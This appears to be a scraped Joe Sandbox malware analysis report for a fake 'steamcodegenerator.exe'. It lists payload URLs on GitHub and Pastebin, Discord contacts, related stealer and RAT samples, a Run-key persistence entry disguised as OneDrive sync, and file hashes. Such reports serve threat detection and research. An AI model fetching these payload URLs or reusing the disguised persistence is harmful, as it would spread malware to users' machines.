                                                                          https://objects.githubusercontent.com/github-production-repository-file-5c1aeb/867932512/17267811?X-steamcodegenerator.exe, 00000000.00000003.2201099145.0000020C72A62000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000003.2187911601.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398727720.0000020C74620000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://objects.githubusercontent.com/GPsteamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://0.discorpowershell.exe, 00000006.00000002.2593081552.000001FB81F9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39D2B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D185681000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://raw.githubusercontent.compowershell.exe, 00000006.00000002.2593081552.000001FB815FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C7F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184BC4000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                  unknown
                                                                                  https://github.com/user-attachments/files/17267811/stm.txt%pinvalidsteamcodegenerator.exefalse
                                                                                    unknown
                                                                                    https://objects.githubusercontent.com/steamcodegenerator.exe, 00000000.00000003.2187911601.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmp, steamcodegenerator.exe, 00000000.00000003.2201099145.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://raw.githubusercontent.compowershell.exe, 00000006.00000002.2593081552.000001FB815FD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80224000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB8161B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80FE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C7C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C7F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184BC4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://github.com/user-attachments/files/17267811/stm.txtlsteamcodegenerator.exe, 00000000.00000002.3398378656.0000020C729DC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://aka.ms/pscore68powershell.exe, 00000004.00000002.2376546046.000001662B951000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39BD2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39BD17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D1840FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D1840E9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://github.com/user-attachments/files/17267811/stm.txtksteamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dllpowershell.exe, 00000006.00000002.2593081552.000001FB81642000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB803C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2593081552.000001FB81649000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                              unknown
                                                                                              http://pastebin.compowershell.exe, 0000000D.00000002.2798056511.000002B39C74A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C1DA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2798056511.000002B39C72E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D18470A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184AFA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://pastebin.compowershell.exe, 0000000D.00000002.2798056511.000002B39C738000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2874987774.000001D184B06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://oneget.orgpowershell.exe, 00000004.00000002.2376546046.000001662CDB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://github.com/B:steamcodegenerator.exe, 00000000.00000002.3398378656.0000020C72A1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    172.67.19.24
                                                                                                    pastebin.comUnited States
                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                    162.159.138.232
                                                                                                    discord.comUnited States
                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                    185.199.109.133
                                                                                                    raw.githubusercontent.comNetherlands
                                                                                                    54113FASTLYUStrue
                                                                                                    140.82.121.3
                                                                                                    github.comUnited States
                                                                                                    36459GITHUBUSfalse
                                                                                                    185.199.111.133
                                                                                                    objects.githubusercontent.comNetherlands
                                                                                                    54113FASTLYUSfalse
                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1534102
                                                                                                    Start date and time:2024-10-15 15:51:13 +02:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 6m 25s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:18
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:steamcodegenerator.exe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal96.troj.evad.winEXE@21/17@5/5
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 50%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 85%
                                                                                                    • Number of executed functions: 29
                                                                                                    • Number of non-executed functions: 74
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .exe
                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 4372 because it is empty
                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 5144 because it is empty
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • VT rate limit hit for: steamcodegenerator.exe
                                                                                                    TimeTypeDescription
                                                                                                    09:52:30API Interceptor427x Sleep call for process: powershell.exe modified
                                                                                                    15:52:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                                                    15:52:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    172.67.19.24cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • pastebin.com/raw/sA04Mwk2
                                                                                                    envifa.vbsGet hashmaliciousUnknownBrowse
                                                                                                    • pastebin.com/raw/V9y5Q5vv
                                                                                                    sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                                    • pastebin.com/raw/V9y5Q5vv
                                                                                                    Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                                                                                    • pastebin.com/raw/NsQ5qTHr
                                                                                                    Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                                                                                    • pastebin.com/raw/NsQ5qTHr
                                                                                                    Dadebehring PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                                                                    • pastebin.com/raw/NsQ5qTHr
                                                                                                    PendingInvoiceBankDetails.JS.jsGet hashmaliciousWSHRATBrowse
                                                                                                    • pastebin.com/raw/NsQ5qTHr
                                                                                                    162.159.138.232cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                      SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exeGet hashmaliciousUnknownBrowse
                                                                                                        SecuriteInfo.com.Python.Muldrop.18.50.31694.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                          Exela(1).exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                                            SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                              http://relay.csgoze520.com/Get hashmaliciousUnknownBrowse
                                                                                                                https://hkdiscord.antsoon.com/Get hashmaliciousUnknownBrowse
                                                                                                                  RebelCracked.exeGet hashmaliciousExela Stealer, Python StealerBrowse
                                                                                                                    lol.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                      ExtremeInjectorV3.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                        185.199.109.133SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                                                        SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                        • raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber_pyld.txt
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        discord.comcr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 162.159.135.232
                                                                                                                        Q1KaSJ8Fom.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 162.159.136.232
                                                                                                                        0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                                                                        • 162.159.137.232
                                                                                                                        0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                                                                        • 162.159.136.232
                                                                                                                        cPl7CoJTBx.exeGet hashmaliciousLuna Grabber, Luna LoggerBrowse
                                                                                                                        • 162.159.128.233
                                                                                                                        SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        SecuriteInfo.com.Python.Muldrop.18.50.31694.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        SecuriteInfo.com.Trojan.PWS.Stealer.39881.18601.16388.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 162.159.136.232
                                                                                                                        SecuriteInfo.com.Win64.Evo-gen.30154.6249.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 162.159.135.232
                                                                                                                        raw.githubusercontent.comcr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                        • 185.199.108.133
                                                                                                                        na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                        • 185.199.109.133
                                                                                                                        na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                        • 185.199.108.133
                                                                                                                        oWARzPF1Ms.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                        • 185.199.108.133
                                                                                                                        oWARzPF1Ms.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                                                        • 185.199.108.133
                                                                                                                        New PO-RFQ13101.xla.xlsxGet hashmaliciousFormBookBrowse
                                                                                                                        • 185.199.110.133
                                                                                                                        Upit 220062.xlsGet hashmaliciousRemcosBrowse
                                                                                                                        • 185.199.108.133
                                                                                                                        Swift Payment 20241014839374.vbsGet hashmaliciousRemcosBrowse
                                                                                                                        • 185.199.111.133
                                                                                                                        Image_Attachments.xlsGet hashmaliciousRemcosBrowse
                                                                                                                        • 185.199.111.133
                                                                                                                        Purchase Order.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                        • 185.199.109.133
                                                                                                                        github.com0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                                                                        • 140.82.112.4
                                                                                                                        0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        Telex-copy-pdf.jarGet hashmaliciousBranchlock Obfuscator, STRRATBrowse
                                                                                                                        • 140.82.121.4
                                                                                                                        https://www.mycimalive.com/Get hashmaliciousUnknownBrowse
                                                                                                                        • 140.82.121.4
                                                                                                                        Payment.Telex-pdf (2).jarGet hashmaliciousBranchlock Obfuscator, STRRATBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        Payment.Telex-pdf.jarGet hashmaliciousBranchlock Obfuscator, STRRATBrowse
                                                                                                                        • 140.82.121.4
                                                                                                                        srSirV44HB.jarGet hashmaliciousBranchlock Obfuscator, STRRATBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        launcher.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 140.82.121.4
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        CLOUDFLARENETUScr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.27.206.92
                                                                                                                        https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                                                                        • 162.159.134.42
                                                                                                                        https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                                                                        • 1.1.1.1
                                                                                                                        ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.21.90.114
                                                                                                                        ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        order.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 188.114.97.3
                                                                                                                        https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 104.17.25.14
                                                                                                                        Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        FASTLYUScr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                        • 185.199.108.133
                                                                                                                        https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 151.101.1.229
                                                                                                                        na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                        • 185.199.109.133
                                                                                                                        na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                        • 185.199.108.133
                                                                                                                        ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                                                        • 199.232.210.172
                                                                                                                        Payment(Ssalazar)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                                                                        • 151.101.65.229
                                                                                                                        RicevutaPagamento_115538206.datGet hashmaliciousUnknownBrowse
                                                                                                                        • 151.101.2.132
                                                                                                                        V6QED2Q1WBYVOPEGet hashmaliciousUnknownBrowse
                                                                                                                        • 151.101.67.6
                                                                                                                        https://www.brstejtv.com/wsxGet hashmaliciousUnknownBrowse
                                                                                                                        • 151.101.193.229
                                                                                                                        https://landing-cs.mailcomms.io/73C4D162CAD9C4016A99EC5AF537DA57B4F5451828F0865A7DC8EA34ED2492F0Get hashmaliciousUnknownBrowse
                                                                                                                        • 151.101.65.229
                                                                                                                        CLOUDFLARENETUScr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        HqvlYZC7Gf.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.27.206.92
                                                                                                                        https://e.cukurovadermatoloji.org.tr/i/Do-BbkmS8do2SSRbfKAqhcJT8K9iB0m-Get hashmaliciousUnknownBrowse
                                                                                                                        • 162.159.134.42
                                                                                                                        https://mayamabraidsweaveslocs.com/jndnnjnjvnjvdnvdnjnjn.htmlGet hashmaliciousUnknownBrowse
                                                                                                                        • 1.1.1.1
                                                                                                                        ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                                                        • 104.21.90.114
                                                                                                                        ordine.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        order.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                        • 188.114.97.3
                                                                                                                        https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 104.17.25.14
                                                                                                                        Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                                                        • 188.114.96.3
                                                                                                                        FASTLYUScr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                        • 185.199.108.133
                                                                                                                        https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 151.101.1.229
                                                                                                                        na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                        • 185.199.109.133
                                                                                                                        na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                        • 185.199.108.133
                                                                                                                        ordine.pdfGet hashmaliciousUnknownBrowse
                                                                                                                        • 199.232.210.172
                                                                                                                        Payment(Ssalazar)CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                                                                        • 151.101.65.229
                                                                                                                        RicevutaPagamento_115538206.datGet hashmaliciousUnknownBrowse
                                                                                                                        • 151.101.2.132
                                                                                                                        V6QED2Q1WBYVOPEGet hashmaliciousUnknownBrowse
                                                                                                                        • 151.101.67.6
                                                                                                                        https://www.brstejtv.com/wsxGet hashmaliciousUnknownBrowse
                                                                                                                        • 151.101.193.229
                                                                                                                        https://landing-cs.mailcomms.io/73C4D162CAD9C4016A99EC5AF537DA57B4F5451828F0865A7DC8EA34ED2492F0Get hashmaliciousUnknownBrowse
                                                                                                                        • 151.101.65.229
                                                                                                                        GITHUBUS0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                                                                        • 140.82.112.4
                                                                                                                        0CX5vBE7nr.exeGet hashmaliciousBabadeda, KDOT TOKEN GRABBERBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        Telex-copy-pdf.jarGet hashmaliciousBranchlock Obfuscator, STRRATBrowse
                                                                                                                        • 140.82.121.4
                                                                                                                        Payment.Telex-pdf (2).jarGet hashmaliciousBranchlock Obfuscator, STRRATBrowse
                                                                                                                        • 140.82.121.4
                                                                                                                        Payment.Telex-pdf.jarGet hashmaliciousBranchlock Obfuscator, STRRATBrowse
                                                                                                                        • 140.82.121.4
                                                                                                                        srSirV44HB.jarGet hashmaliciousBranchlock Obfuscator, STRRATBrowse
                                                                                                                        • 140.82.121.4
                                                                                                                        Request For Quotation.jsGet hashmaliciousSTRRATBrowse
                                                                                                                        • 140.82.121.4
                                                                                                                        launcher.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 140.82.112.4
                                                                                                                        launcher.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 140.82.121.4
                                                                                                                        SecuriteInfo.com.FileRepMalware.7131.28226.exeGet hashmaliciousUnknownBrowse
                                                                                                                        • 140.82.121.5
                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0ecr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        • 172.67.19.24
                                                                                                                        • 185.199.109.133
                                                                                                                        https://www.google.com.tw/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDFX0jkXyycT&sa=t&esrc=WSECxFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ9mfdQ6lDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bkartratraining.%E2%80%8Bco%C2%ADm%2Fcheckout%2Fchart%2Fgy87uy953g6gh8h55hx98uh/d2VzdG9uLmhpbnNvbkBhcmdvZ3JvdXB1cy5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        • 172.67.19.24
                                                                                                                        • 185.199.109.133
                                                                                                                        na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        • 172.67.19.24
                                                                                                                        • 185.199.109.133
                                                                                                                        na.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        • 172.67.19.24
                                                                                                                        • 185.199.109.133
                                                                                                                        LISTA DE COTIZACIONES.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        • 172.67.19.24
                                                                                                                        • 185.199.109.133
                                                                                                                        https://doc.triadexport.in/sen43906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab950143906919549ed0e54ebff83709ab9/?top=janice.atkins@faa.govGet hashmaliciousHTMLPhisherBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        • 172.67.19.24
                                                                                                                        • 185.199.109.133
                                                                                                                        PO-10-15-2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        • 172.67.19.24
                                                                                                                        • 185.199.109.133
                                                                                                                        https://landing-cs.mailcomms.io/73C4D162CAD9C4016A99EC5AF537DA57B4F5451828F0865A7DC8EA34ED2492F0Get hashmaliciousUnknownBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        • 172.67.19.24
                                                                                                                        • 185.199.109.133
                                                                                                                        https://www.filmize.art/azacGet hashmaliciousUnknownBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        • 172.67.19.24
                                                                                                                        • 185.199.109.133
                                                                                                                        r8k29DBraE.exeGet hashmaliciousXWormBrowse
                                                                                                                        • 162.159.138.232
                                                                                                                        • 172.67.19.24
                                                                                                                        • 185.199.109.133
                                                                                                                        37f463bf4616ecd445d4a1937da06e19Factura.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        Prximos VencimientosPDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        dg_official01.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        doc-Impostos.cmdGet hashmaliciousUnknownBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        9evHLnwull.exeGet hashmaliciousVidarBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        Proforma_InvoicePDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        CHHE6LLjWx.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        Request for Quotation MK FMHS.RFQ.10.24.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        Request for Quotation MK FMHS.RFQ.10.24.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        Request for Quotation MK FMHS.RFQ.10.24_PDF.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                        • 140.82.121.3
                                                                                                                        • 185.199.111.133
                                                                                                                        No context
                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1728
                                                                                                                        Entropy (8bit):4.527272298423835
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                                                                                                        MD5:724AA21828AD912CB466E3B0A79F478B
                                                                                                                        SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                                                                                                        SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                                                                                                        SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
